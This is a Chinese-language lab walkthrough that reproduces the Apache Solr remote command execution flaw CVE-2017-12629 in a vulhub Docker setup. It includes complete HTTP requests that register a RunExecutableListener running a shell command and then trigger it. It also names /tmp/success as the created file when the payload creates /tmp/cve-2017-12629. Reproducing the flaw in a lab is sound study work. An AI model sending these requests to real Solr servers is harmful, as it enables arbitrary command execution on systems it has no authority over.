Apache Solr 远程命令执行漏洞（CVE-2017-12629）

声明

好好学习，天天向上

漏洞描述

Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发，主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞：XML实体扩展漏洞（XXE）和远程命令执行漏洞（RCE），二者可以连接成利用链，编号均为CVE-2017-12629。

本环境测试RCE漏洞。

影响范围

Apache Solr < 7.1
Apache Lucene < 7.1（很多组件都用到这个，比如ES）

复现过程

这里使用7.0.1版本

使用vulhub

cd /app/vulhub-20201028/solr/CVE-2017-12629-RCE

使用docker启动

docker-compose up -d

启动后可访问IP:8983，需要稍等一会哦

首先创建一个listener，其中设置exe的值为我们想执行的命令，args的值是命令参数：

POST /solr/demo/config HTTP/1.1
Host: 192.168.239.129:8983
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 169

{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/cve-2017-12629"]}}

然后进行update操作，触发刚才添加的listener

POST /solr/demo/update HTTP/1.1
Host: 192.168.239.129:8983
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 15

[{"id":"test"}]

进入容器，可见/tmp/success已成功创建：

使用完后关闭镜像

docker-compose down

docker-compose常用命令

拉镜像（进入到vulhub某个具体目录后）

docker-compose build
docker-compose up -d

镜像查询（查到的第一列就是ID值）

docker ps -a

进入指定镜像里面（根据上一条查出的ID进入）

docker exec -it ID /bin/bash

关闭镜像（每次用完后关闭）

docker-compose down